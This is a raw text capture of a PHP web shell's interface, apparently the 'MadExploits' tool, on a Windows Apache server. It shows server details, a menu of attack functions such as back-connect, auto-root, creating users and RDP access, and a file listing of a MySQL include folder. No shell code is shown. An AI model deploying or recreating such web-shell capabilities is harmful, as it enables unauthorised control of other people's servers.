Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
mysql /
mysql-8.0.30-winx64 /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
mysql
[ DIR ]
drwxrwxrwx
openssl
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
errmsg.h
5.55
KB
-rw-rw-rw-
field_types.h
2.96
KB
-rw-rw-rw-
my_command.h
4.3
KB
-rw-rw-rw-
my_compress.h
3.56
KB
-rw-rw-rw-
my_list.h
2.02
KB
-rw-rw-rw-
mysql.h
32.7
KB
-rw-rw-rw-
mysql_com.h
36.32
KB
-rw-rw-rw-
mysql_time.h
3.47
KB
-rw-rw-rw-
mysql_version.h
1.09
KB
-rw-rw-rw-
mysqld_error.h
251.89
KB
-rw-rw-rw-
mysqlx_ername.h
7.13
KB
-rw-rw-rw-
mysqlx_error.h
4.11
KB
-rw-rw-rw-
mysqlx_version.h
1.8
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql_version.h
/* Copyright Abandoned 1996,1999 TCX DataKonsult AB & Monty Program KB & Detron HB, 1996, 1999-2004, 2007 MySQL AB. This file is public domain and comes with NO WARRANTY of any kind */ /* Version numbers for protocol & mysqld */ #ifndef _mysql_version_h #define _mysql_version_h #define PROTOCOL_VERSION 10 #define MYSQL_SERVER_VERSION "8.0.30" #define MYSQL_BASE_VERSION "mysqld-8.0" #define MYSQL_SERVER_SUFFIX_DEF "" #define MYSQL_VERSION_ID 80030 #define MYSQL_PORT 3306 #define MYSQL_ADMIN_PORT 33062 #define MYSQL_PORT_DEFAULT 0 #define MYSQL_UNIX_ADDR "/tmp/mysql.sock" #define MYSQL_CONFIG_NAME "my" #define MYSQL_PERSIST_CONFIG_NAME "mysqld-auto" #define MYSQL_COMPILATION_COMMENT "MySQL Community - GPL" #define MYSQL_COMPILATION_COMMENT_SERVER "MySQL Community Server - GPL" #define LIBMYSQL_VERSION "8.0.30" #define LIBMYSQL_VERSION_ID 80030 #ifndef LICENSE #define LICENSE GPL #endif /* LICENSE */ #endif /* _mysql_version_h */
Close